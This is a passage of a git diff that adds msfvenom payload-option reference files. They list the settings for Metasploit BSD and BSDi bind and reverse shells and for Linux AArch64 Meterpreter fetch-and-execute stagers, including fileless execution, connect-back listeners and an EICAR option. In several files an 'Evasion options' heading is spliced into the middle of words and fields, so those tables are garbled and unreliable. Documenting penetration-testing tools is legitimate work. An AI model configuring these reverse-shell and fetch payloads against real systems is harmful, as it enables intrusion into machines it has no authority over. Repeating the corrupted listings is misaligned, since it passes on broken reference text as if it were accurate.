setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x86-shell_bind_tcp_ipv6.txt b/msfvenom/payload_options/bsd-x86-shell_bind_tcp_ipv6.txt new file mode 100644 index 0000000..545afbb --- /dev/null +++ b/msfvenom/payload_options/bsd-x86-shell_bind_tcp_ipv6.txt @@ -0,0 +1,40 @@ + + Name: BSD Command Shell, Bind TCP Inline (IPv6) + Module: payload/bsd/x86/shell_bind_tcp_ipv6 + Platform: BSD + Arch: x86 +Needs Admin: No + Total size: 87 + Rank: Normal + +Provided by: + skape + vlad902 + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x86-shell_find_port.txt b/msfvenom/payload_options/bsd-x86-shell_find_port.txt new file mode 100644 index 0000000..1d374b4 --- /dev/null +++ b/msfvenom/payload_options/bsd-x86-shell_find_port.txt @@ -0,0 +1,37 @@ + + Name: BSD Command Shell, Find Port Inline + Module: payload/bsd/x86/shell_find_port + Platform: BSD + Arch: x86 +Needs Admin: No + Total size: 60 + Rank: Normal + +Provided by: + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CPORT 35777 no The local client port + +Description: + Spawn a shell on an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x86-shell_find_tag.txt b/msfvenom/payload_options/bsd-x86-shell_find_tag.txt new file mode 100644 index 0000000..72622ea --- /dev/null +++ b/msfvenom/payload_options/bsd-x86-shell_find_tag.txt @@ -0,0 +1,33 @@ + + Name: BSD Command Shell, Find Tag Inline + Module: payload/bsd/x86/shell_find_tag + Platform: BSD + Arch: x86 +Needs Admin: No + Total size: 70 + Rank: Normal + +Provided by: + skape + +Description: + Spawn a shell on an established connection (proxy/NAT safe) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + TAG T2v6 yes The four byte tag to signify the connection. + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x86-shell_reverse_tcp.txt b/msfvenom/payload_options/bsd-x86-shell_reverse_tcp.txt new file mode 100644 index 0000000..2a16c72 --- /dev/null +++ b/msfvenom/payload_options/bsd-x86-shell_reverse_tcp.txt @@ -0,0 +1,45 @@ + + Name: BSD Command Shell, Reverse TCP Inline + Module: payload/bsd/x86/shell_reverse_tcp + Platform: BSD + Arch: x86 +Needs Admin: No + Total size: 64 + Rank: Normal + +Provided by: + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsd-x86-shell_reverse_tcp_ipv6.txt b/msfvenom/payload_options/bsd-x86-shell_reverse_tcp_ipv6.txt new file mode 100644 index 0000000..98e9d6a --- /dev/null +++ b/msfvenom/payload_options/bsd-x86-shell_reverse_tcp_ipv6.txt @@ -0,0 +1,48 @@ + + Name: BSD Command Shell, Reverse TCP Inline (IPv6) + Module: payload/bsd/x86/shell_reverse_tcp_ipv6 + Platform: BSD + Arch: x86 +Needs Admin: No + Total size: 96 + Rank: Normal + +Provided by: + skape + vlad902 + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SCOPEID 0 no IPv6 scope ID, for link-local addresses + +Description: + Connect back to attacker and spawn a command shell over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Append a stub that executes the exit(0) system call + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsdi-x86-shell-bind_tcp.txt b/msfvenom/payload_options/bsdi-x86-shell-bind_tcp.txt new file mode 100644 index 0000000..d22b056 --- /dev/null +++ b/msfvenom/payload_options/bsdi-x86-shell-bind_tcp.txt @@ -0,0 +1,43 @@ + + Name: BSDi Command Shell, Bind TCP Stager + Module: payload/bsdi/x86/shell/bind_tcp + Platform: BSDi + Arch: x86 +Needs Admin: No + Total size: 69 + Rank: Normal + +Provided by: + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Spawn a command shell (staged). + + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EnableStageEncoding false no Encode the second stage payload + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsdi-x86-shell-reverse_tcp.txt b/msfvenom/payload_options/bsdi-x86-shell-reverse_tcp.txt new file mode 100644 index 0000000..e37251c --- /dev/null +++ b/msfvenom/payload_options/bsdi-x86-shell-reverse_tcp.txt @@ -0,0 +1,50 @@ + + Name: BSDi Command Shell, Reverse TCP Stager + Module: payload/bsdi/x86/shell/reverse_tcp + Platform: BSDi + Arch: x86 +Needs Admin: No + Total size: 59 + Rank: Normal + +Provided by: + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EnableStageEncoding false no Encode the second stage payload + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsdi-x86-shell_bind_tcp.txt b/msfvenom/payload_options/bsdi-x86-shell_bind_tcp.txt new file mode 100644 index 0000000..9506bd0 --- /dev/null +++ b/msfvenom/payload_options/bsdi-x86-shell_bind_tcp.txt @@ -0,0 +1,32 @@ + + Name: BSDi Command Shell, Bind TCP Inline + Module: payload/bsdi/x86/shell_bind_tcp + Platform: BSDi + Arch: x86 +Needs Admin: No + Total size: 90 + Rank: Normal + +Provided by: + skape + optyx + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsdi-x86-shell_find_port.txt b/msfvenom/payload_options/bsdi-x86-shell_find_port.txt new file mode 100644 index 0000000..81f2144 --- /dev/null +++ b/msfvenom/payload_options/bsdi-x86-shell_find_port.txt @@ -0,0 +1,31 @@ + + Name: BSDi Command Shell, Find Port Inline + Module: payload/bsdi/x86/shell_find_port + Platform: BSDi + Arch: x86 +Needs Admin: No + Total size: 77 + Rank: Normal + +Provided by: + skape + optyx + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CPORT 37232 no The local client port + +Description: + Spawn a shell on an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/bsdi-x86-shell_reverse_tcp.txt b/msfvenom/payload_options/bsdi-x86-shell_reverse_tcp.txt new file mode 100644 index 0000000..44a7e83 --- /dev/null +++ b/msfvenom/payload_options/bsdi-x86-shell_reverse_tcp.txt @@ -0,0 +1,39 @@ + + Name: BSDi Command Shell, Reverse TCP Inline + Module: payload/bsdi/x86/shell_reverse_tcp + Platform: BSDi + Arch: x86 +Needs Admin: No + Total size: 77 + Rank: Normal + +Provided by: + skape + optyx + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-aarch64-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-aarch64-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..162639c --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-aarch64-meterpreter-reverse_tcp.txt @@ -0,0 +1,100 @@ + + Name: HTTP Fetch, Reverse TCP Stager + Module: payload/cmd/linux/http/aarch64/meterpreter/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Norma +Evasion options for payload/cmd/linux/http/aarch64/meterpreter/reverse_tcp: +========================= + +ic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME fGKaZjGk no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from an HTTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-aarch64-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-http-aarch64-meterpreter_reverse_http.txt new file mode 100644 index 0000000..0418680 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-aarch64-meterpreter_reverse_http.txt @@ -0,0 +1,104 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/aarch64/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + B +Evasion options for payload/cmd/linux/http/aarch64/meterpreter_reverse_http: +========================= + +@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME QJpbzCbQetk no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-aarch64-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-http-aarch64-meterpreter_reverse_https.txt new file mode 100644 index 0000000..1efd4f4 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-aarch64-meterpreter_reverse_https.txt @@ -0,0 +1,106 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/aarch64/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Br +Evasion options for payload/cmd/linux/http/aarch64/meterpreter_reverse_https: +========================= + +apid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME htteRZaNp no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the 